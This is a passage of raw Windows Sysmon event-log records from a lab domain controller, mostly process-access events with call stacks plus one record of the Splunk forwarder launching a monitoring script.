.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.857{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5D00-00000000A301}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.857{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5B-6005-5D00-00000000A301}4036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.857{59A5CD1D-8E5B-6005-5D00-00000000A301}4036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.794{59A5CD1D-8E44-6005-0B00-00000000A301}856100C:\Windows\system32\lsass.exe{59A5CD1D-8E5B-6005-5C00-00000000A301}3992C:\Windows\System32\Wbem\wmic.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.793{59A5CD1D-8E44-6005-0B00-00000000A301}856100C:\Windows\system32\lsass.exe{59A5CD1D-8E5B-6005-5C00-00000000A301}3992C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.790{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E5B-6005-5C00-00000000A301}3992C:\Windows\System32\Wbem\wmic.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.777{59A5CD1D-8E5B-6005-5B00-00000000A301}39363912C:\Windows\system32\conhost.exe{59A5CD1D-8E5B-6005-5C00-00000000A301}3992C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.775{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.775{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.775{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.775{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.775{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.774{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.774{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5B-6005-5C00-00000000A301}3992C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:19.774{59A5CD1D-8E5B-6005-5500-00000000A301}37483696C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{59A5CD1D-8E5B-6005-5C00-00000000A301}3992C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 